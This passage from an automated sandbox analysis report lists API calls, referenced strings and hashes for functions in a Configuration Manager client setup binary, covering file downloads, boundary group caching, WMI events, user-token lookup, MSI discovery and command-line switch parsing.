                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FindH_prolog3_catch_$File$CloseFirstH_prolog3H_prolog3_catchNext
                                                                                          • String ID: %$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.$4?k$4[k$CcmSetup::GetDownloadFileList$File '%s' is a local file. No need to download.$GetFileNameFromQualifiedPath( sFileName, sPackageName )$The manifest has no files that require download or installation.$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi$oSetupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, 0, &bLocal $oSetupManifest.GetInstallListCount( iFileCount )
                                                                                          • API String ID: 2004009170-3969336629
                                                                                          • Opcode ID: b3012a099b823f9b9d6c4afc2ca89a3167d80101192b9f5fd272991b85ede751
                                                                                          • Instruction ID: 39f8cbab141685144ea87e92018b21199adfe65602c3dce89e19b62bb69f6e7f
                                                                                          • Opcode Fuzzy Hash: b3012a099b823f9b9d6c4afc2ca89a3167d80101192b9f5fd272991b85ede751
                                                                                          • Instruction Fuzzy Hash: EE32BA71904259EBDB22EBA4CD49BEEBBB8BF51300F1440D9E549B7182DB745B88CF21
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065114E
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 00609759: __EH_prolog3.LIBCMT ref: 00609760
                                                                                            • Part of subcall function 00609949: __EH_prolog3.LIBCMT ref: 00609950
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651252
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651300
                                                                                          • EnterCriticalSection.KERNEL32(0093A408,00000000,?,//ClientLocationInfo,00000008,CCM::LocationServices::CcmGetBoundaryGroupCacheToXml,?,0001-01-01 00:00:00.000,000000A4,0064C910,00000000,?,?,00000008,?,00000000), ref: 00651328
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006513AC
                                                                                          • LeaveCriticalSection.KERNEL32(0093A408,BoundaryGroupGUIDs,?,BoundaryGroupIDs,?,CacheToken,?,BoundaryGroupCache=@,00000000,00000000,root\ccm\LocationServices,00000001,00000000,00000000,00000000,?), ref: 006513D9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065142B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651488
                                                                                            • Part of subcall function 006100EB: SafeArrayDestroy.OLEAUT32(?), ref: 006100F7
                                                                                            • Part of subcall function 0060B823: __EH_prolog3_catch.LIBCMT ref: 0060B82A
                                                                                            • Part of subcall function 0060B823: GetCurrentThreadId.KERNEL32 ref: 0060B886
                                                                                          • LeaveCriticalSection.KERNEL32(0093A408,root\ccm\LocationServices,00000001,00000000,00000000,00000000,?,//ClientLocationInfo,00000008,CCM::LocationServices::CcmGetBoundaryGroupCacheToXml,?,0001-01-01 00:00:00.000,000000A4,0064C910,00000000,?), ref: 006514C4
                                                                                            • Part of subcall function 0061013A: __EH_prolog3_catch.LIBCMT ref: 00610141
                                                                                            • Part of subcall function 0061013A: GetCurrentThreadId.KERNEL32 ref: 00610197
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651587
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006515A8
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006515B4
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 006515BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651600
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065165D
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006516FB
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00651707
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00651710
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeString$H_prolog3$CriticalSection$H_prolog3_catchLeave$ArrayDestroyEnterH_prolog3_catch_Safe
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$//ClientLocationInfo$0001-01-01 00:00:00.000$BoundaryGroup$BoundaryGroupCache=@$BoundaryGroupFlags$BoundaryGroupGUIDs$BoundaryGroupIDs$BoundaryGroupListRetrieveTime$BoundaryGroups$CCM::LocationServices::CcmGetBoundaryGroupCacheToXml$CacheToken$GroupFlag$GroupGUID$GroupID$doc$parentElement$root\ccm\LocationServices$saBoundaryGroupFlags.getBstr(i, &bsGroupFlag)$saBoundaryGroupGUIDs.getBstr(i, &bsGroupGUID)$saBoundaryGroupIDs.getBstr(i, &bsGroupID)$spBoundaryGroupCache.GetArray(c_szBGCacheGUIDs, &saBoundaryGroupGUIDs)$spBoundaryGroupCache.GetArray(c_szBGCacheIDs, &saBoundaryGroupIDs)$spBoundaryGroupCache.GetString(c_szBGCacheToken, sCacheToken)
                                                                                          • API String ID: 2822274989-2751417708
                                                                                          • Opcode ID: b476b6d76b5f0d28ae32fa4f50d232f02862ac8e536c2e4226e84e9571c956bf
                                                                                          • Instruction ID: 161754766485c64aa337c63ce0c9411e6c6d078e21f900d149d7c4a9fd3b3d91
                                                                                          • Opcode Fuzzy Hash: b476b6d76b5f0d28ae32fa4f50d232f02862ac8e536c2e4226e84e9571c956bf
                                                                                          • Instruction Fuzzy Hash: 1802D330D40258EADF15EBA4CD49BEDBF76BF15700F148099E449BB2D2DBB44A48CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006120CD
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612159
                                                                                            • Part of subcall function 0060158F: __EH_prolog3_catch.LIBCMT ref: 00601596
                                                                                            • Part of subcall function 0060158F: GetCurrentThreadId.KERNEL32 ref: 006015F3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006121C2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061228D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612300
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612362
                                                                                          • CoCreateGuid.OLE32(?,CCM_PendingEvent,00000000,00000000,CCM\Events,00000000,00000000,?,00000001,?,?,?,?,CCMHTTPPORT,CcmSetup::CalculateParameters,000000FC), ref: 00612378
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006123AD
                                                                                            • Part of subcall function 005F3F81: __EH_prolog3_catch_GS.LIBCMT ref: 005F3F8B
                                                                                            • Part of subcall function 005F3F81: StringFromGUID2.OLE32(00000064,00000008,00000032,CCM::Utility::String::String,0000008C,005C9BC7,?), ref: 005F3FD1
                                                                                            • Part of subcall function 005F3F81: GetCurrentThreadId.KERNEL32 ref: 005F3FFE
                                                                                            • Part of subcall function 005F3F81: __CxxThrowException@8.LIBCMT ref: 005F4086
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061242A
                                                                                            • Part of subcall function 006095D1: VariantClear.OLEAUT32(?), ref: 006095DE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612477
                                                                                            • Part of subcall function 006038EF: __EH_prolog3_catch.LIBCMT ref: 006038F6
                                                                                            • Part of subcall function 006038EF: GetCurrentThreadId.KERNEL32 ref: 00603953
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006124D0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061251D
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_$ClearCreateException@8FromGuidStringThrowVariant
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$CCM::Utility::SubmitCcmPendingEvent$CCM\Events$CCM_Event$CCM_PendingEvent$CoCreateGuid(&gEventID)$Event$EventID$EventID$Failed to submit pending event to WMI.$Raising pending event:%s$Successfully submitted pending event to WMI.$h'w$pEvent != 0$pEvent->InheritsFrom(c_szCcmEventClass) == ((HRESULT)0L)$spNamespace.CreateInstance( c_szCcmPendingEventClass, &spPendingEvent )$spNamespace.Open( c_szEventingNamespace, false, 0, (uFlags & CcmEvent_UseAdminLocator) != 0 )$spNamespace.PutInstance(spPendingEvent)$spPendingEvent.Set(L"Event", vValue)$spPendingEvent.SetString(L"EventID", String(gEventID))$spPendingEvent.SetString(L"EventID", pszEventID)$vValue.setUnknown(pEvent)
                                                                                          • API String ID: 232579505-4074030258
                                                                                          • Opcode ID: bc774df8a47a71f89073e43c0ca2c56b68e38accfb32de3c5a0e4ffd6fe7b51d
                                                                                          • Instruction ID: 6f47b14ca61cda52dc0a46215d8394a5c46382251f69e6541f489d61233b1ee1
                                                                                          • Opcode Fuzzy Hash: bc774df8a47a71f89073e43c0ca2c56b68e38accfb32de3c5a0e4ffd6fe7b51d
                                                                                          • Instruction Fuzzy Hash: B1D1E9B0D40355AADF21DBA4CD1AFEE7F7AAF51B44F188049F504A7283C7785A46CB60
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061424E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006142B3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614313
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614352
                                                                                          • ConvertStringSidToSidW.ADVAPI32(?,?), ref: 00614379
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006143A9
                                                                                          • WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614420
                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614429
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061445F
                                                                                          • WTSQueryUserToken.WTSAPI32(?,00000000,00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\), ref: 006144D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614548
                                                                                          • CloseHandle.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000), ref: 00614584
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006145C3
                                                                                          • CloseHandle.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000), ref: 0061460E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614648
                                                                                          • CloseHandle.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001), ref: 006146A1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006146F3
                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000002,00000000,00000000,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614724
                                                                                          • WTSFreeMemory.WTSAPI32(00000000,00000000,00000002,00000000,00000000,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614733
                                                                                          Strings
                                                                                          • ..\usertoken.cpp, xrefs: 0061431F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00614643
                                                                                          • ..\usertoken.cpp, xrefs: 00614342
                                                                                          • ..\usertoken.cpp, xrefs: 0061444F
                                                                                          • ..\usertoken.cpp, xrefs: 006146FB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006146EE
                                                                                          • CCM::Utility::Security::GetUserTokenFromSid, xrefs: 0061426C
                                                                                          • ..\usertoken.cpp, xrefs: 006145CB
                                                                                          • ::WTSEnumerateSessions( WTS_CURRENT_SERVER_HANDLE, 0, 1, &pSessions, &dwCount), xrefs: 00614455
                                                                                          • NULL != *phToken, xrefs: 0061463E
                                                                                          • ..\usertoken.cpp, xrefs: 006142BF
                                                                                          • ..\usertoken.cpp, xrefs: 006145B3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061434D
                                                                                          • GetElevatedToken(shUserToken, phToken), xrefs: 0061453E
                                                                                          • phToken, xrefs: 00614348
                                                                                          • ..\usertoken.cpp, xrefs: 00614303
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061430E
                                                                                          • ConvertStringSidToSid(szUserSid, &pSid), xrefs: 0061439F
                                                                                          • Tkw, xrefs: 006143C7
                                                                                          • ..\usertoken.cpp, xrefs: 006146E3
                                                                                          • ..\usertoken.cpp, xrefs: 00614550
                                                                                          • ..\usertoken.cpp, xrefs: 006143B1
                                                                                          • GetRestrictedToken(shUserToken, phToken), xrefs: 006145B9
                                                                                          • szUserSid, xrefs: 006142A9
                                                                                          • ..\usertoken.cpp, xrefs: 00614467
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00614543
                                                                                          • ..\usertoken.cpp, xrefs: 006142A3
                                                                                          • L'\0' != szUserSid[0], xrefs: 00614309
                                                                                          • ..\usertoken.cpp, xrefs: 0061435E
                                                                                          • ..\usertoken.cpp, xrefs: 00614638
                                                                                          • User sid %s is invalid., xrefs: 006143D4
                                                                                          • Could not enumerate terminal server sessions, 0x%x, xrefs: 00614495
                                                                                          • ..\usertoken.cpp, xrefs: 00614538
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006145BE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006142AE
                                                                                          • ..\usertoken.cpp, xrefs: 00614650
                                                                                          • ..\usertoken.cpp, xrefs: 00614399
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061445A
                                                                                          • GetLoggedOnUserToken(dwSessionId, fGetElevatedToken, phToken, 0), xrefs: 006146E9
                                                                                          • GetuserTokenFromSid, couldn't find logon session for user sid %s, xrefs: 00614673
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006143A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseHandle$Free$ConvertEnumerateErrorH_prolog3_catch_LastLocalMemoryQuerySessionsStringTokenUser
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$::WTSEnumerateSessions( WTS_CURRENT_SERVER_HANDLE, 0, 1, &pSessions, &dwCount)$CCM::Utility::Security::GetUserTokenFromSid$ConvertStringSidToSid(szUserSid, &pSid)$Could not enumerate terminal server sessions, 0x%x$GetElevatedToken(shUserToken, phToken)$GetLoggedOnUserToken(dwSessionId, fGetElevatedToken, phToken, 0)$GetRestrictedToken(shUserToken, phToken)$GetuserTokenFromSid, couldn't find logon session for user sid %s$L'\0' != szUserSid[0]$NULL != *phToken$Tkw$User sid %s is invalid.$phToken$szUserSid
                                                                                          • API String ID: 1504759256-1784351800
                                                                                          • Opcode ID: d8da3fc01754dfe55e2ef72efee8137ba5cc6dc8919acd453b9fbbf89e459bdf
                                                                                          • Instruction ID: 665219ddb76970ad70e426ff7c45ffb14e963a9f6869ccba940f71800b3e3680
                                                                                          • Opcode Fuzzy Hash: d8da3fc01754dfe55e2ef72efee8137ba5cc6dc8919acd453b9fbbf89e459bdf
                                                                                          • Instruction Fuzzy Hash: BFD1D0B0D40258BADF10DBA0DD4AFEE7EB6AF51B54F188014F508B72C1DBB84A85CB50
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A5138
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                            • Part of subcall function 005AA3D1: __EH_prolog3_catch.LIBCMT ref: 005AA3D8
                                                                                            • Part of subcall function 005AA3D1: GetCurrentThreadId.KERNEL32 ref: 005AA471
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A520C
                                                                                            • Part of subcall function 005AA3D1: GetCurrentThreadId.KERNEL32 ref: 005AA4FB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5271
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5317
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5379
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A54BD
                                                                                            • Part of subcall function 005AA98E: SysFreeString.OLEAUT32(00000000), ref: 005AA9BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A53DC
                                                                                            • Part of subcall function 005AB8A2: __EH_prolog3_catch_GS.LIBCMT ref: 005AB8AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A5437
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A555D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A56B9
                                                                                          Strings
                                                                                          • Identifier, xrefs: 005A51CF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5374
                                                                                          • manifest.cpp, xrefs: 005A5261
                                                                                          • manifest.cpp, xrefs: 005A5279
                                                                                          • manifest.cpp, xrefs: 005A54AD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A54B8
                                                                                          • manifest.cpp, xrefs: 005A56C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5432
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A56B4
                                                                                          • manifest.cpp, xrefs: 005A554D
                                                                                          • Failed to discover MSI item. Error 0x%x, xrefs: 005A572D
                                                                                          • !sIdentifier.empty(), xrefs: 005A5267
                                                                                          • UseUpgradeCode, xrefs: 005A52D6
                                                                                          • RunVersionComparison( sOperator, sInstalledVersion, sVersion, bResult ), xrefs: 005A56AF
                                                                                          • spNode.selectNode(c_szXML_Item_Discovery_Property_Version_Query, &spResultNode, false), xrefs: 005A536F
                                                                                          • manifest.cpp, xrefs: 005A53E4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5558
                                                                                          • true, xrefs: 005A545C
                                                                                          • manifest.cpp, xrefs: 005A5427
                                                                                          • manifest.cpp, xrefs: 005A56A9
                                                                                          • spNode.getAttribute(c_szXML_Item_Discovery_UseUpgradeCodeAttr, sUseUpgradeCode), xrefs: 005A530D
                                                                                          • spResultNode.getAttribute(c_szXML_Item_Discovery_Property_OperatorAttr, sOperator), xrefs: 005A542D
                                                                                          • CheckProductInstalled( sIdentifier, bInstalled, sInstalledVersion ), xrefs: 005A5553
                                                                                          • manifest.cpp, xrefs: 005A531F
                                                                                          • spResultNode.getText(sVersion), xrefs: 005A53D2
                                                                                          • Property[@Name='Version'], xrefs: 005A5336
                                                                                          • manifest.cpp, xrefs: 005A51FC
                                                                                          • GetProductInstalledByUpgradeCode( sIdentifier, bInstalled, sInstalledVersion ), xrefs: 005A54B3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A526C
                                                                                          • Ccmsetup.xml node missing required attribute: Identifier, xrefs: 005A52A1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5312
                                                                                          • manifest.cpp, xrefs: 005A5565
                                                                                          • CcmSetupManifest::DiscoverMSIItem, xrefs: 005A51AA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A5207
                                                                                          • Couldn't find a product with MSI product code '%s' in the MSI database., xrefs: 005A55AB
                                                                                          • manifest.cpp, xrefs: 005A53CC
                                                                                          • manifest.cpp, xrefs: 005A54C5
                                                                                          • Checking '%s' version '%s' expecting %s '%s'., xrefs: 005A5658
                                                                                          • manifest.cpp, xrefs: 005A5369
                                                                                          • spNode.getAttribute(c_szXML_Item_Discovery_IdentifierAttr, sIdentifier), xrefs: 005A5202
                                                                                          • H&l, xrefs: 005A532A
                                                                                          • Operator, xrefs: 005A53F2
                                                                                          • manifest.cpp, xrefs: 005A5214
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A53D7
                                                                                          • manifest.cpp, xrefs: 005A5381
                                                                                          • Couldn't find a product with MSI upgrade code '%s' in the MSI database., xrefs: 005A5513
                                                                                          • manifest.cpp, xrefs: 005A543F
                                                                                          • manifest.cpp, xrefs: 005A5307
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_$FreeH_prolog3_catchString
                                                                                          • String ID: !sIdentifier.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetupManifest::DiscoverMSIItem$Ccmsetup.xml node missing required attribute: Identifier$CheckProductInstalled( sIdentifier, bInstalled, sInstalledVersion )$Checking '%s' version '%s' expecting %s '%s'.$Couldn't find a product with MSI product code '%s' in the MSI database.$Couldn't find a product with MSI upgrade code '%s' in the MSI database.$Failed to discover MSI item. Error 0x%x$GetProductInstalledByUpgradeCode( sIdentifier, bInstalled, sInstalledVersion )$H&l$Identifier$Operator$Property[@Name='Version']$RunVersionComparison( sOperator, sInstalledVersion, sVersion, bResult )$UseUpgradeCode$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$spNode.getAttribute(c_szXML_Item_Discovery_IdentifierAttr, sIdentifier)$spNode.getAttribute(c_szXML_Item_Discovery_UseUpgradeCodeAttr, sUseUpgradeCode)$spNode.selectNode(c_szXML_Item_Discovery_Property_Version_Query, &spResultNode, false)$spResultNode.getAttribute(c_szXML_Item_Discovery_Property_OperatorAttr, sOperator)$spResultNode.getText(sVersion)$true
                                                                                          • API String ID: 1919931159-2590330973
                                                                                          • Opcode ID: 092fe4a59146cb5b3b6646453a3d558f68ebe9df227c68cc3fe2ec5a5752c5b4
                                                                                          • Instruction ID: cf3312efa1654155a251a5aed62e84c0c89b162573c4eb8b5edaf3fc737b8591
                                                                                          • Opcode Fuzzy Hash: 092fe4a59146cb5b3b6646453a3d558f68ebe9df227c68cc3fe2ec5a5752c5b4
                                                                                          • Instruction Fuzzy Hash: 22F19F71D40268AADF21DBA0CC0AFAE7EB9FF56704F154089E40977282D7745A45CB62
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0059540A
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005BA3B9: __EH_prolog3_GS.LIBCMT ref: 005BA3C0
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_H_prolog3_catch_
                                                                                          • String ID: !sValue.empty()$!sValue.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/BITSPriority:$/alwaysexcludeupgrade:$/downloadtimeout:$/excludefeatures:$/forcereboot$/log:$/logon$/nostart$/qf$/qr$/skipprereq:$/skipsignchecks$/usepkicert$CcmSetup::ParseCommonSwitches$FOREGROUND$HIGH$LOW$NORMAL$Unknown BITS priority '%s'. Setting priority to normal.$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$sValue.empty() == false$sValue.empty() == false$sValue.tokenize(c_szOption_Separator, m_arrExcludeFeatures)$sValue.tokenize(c_szOption_Separator, m_arrSkipPreReqs)$true
                                                                                          • API String ID: 3654751754-2284400073
                                                                                          • Opcode ID: d49b526af7b19b376c8962b302bbf9df8181545665bae5ebc7fbabc4407b8c2b
                                                                                          • Instruction ID: dd2d0410a6e3a62d004a57bb0fa791670b728e76659d98b30c8457d40327e038
                                                                                          • Opcode Fuzzy Hash: d49b526af7b19b376c8962b302bbf9df8181545665bae5ebc7fbabc4407b8c2b
                                                                                          • Instruction Fuzzy Hash: 11D1DF70A8074AEADF12DBA4CD06EFDBFB5BF21700F154019F511AA182FB646A59CB90
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064436E
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644455
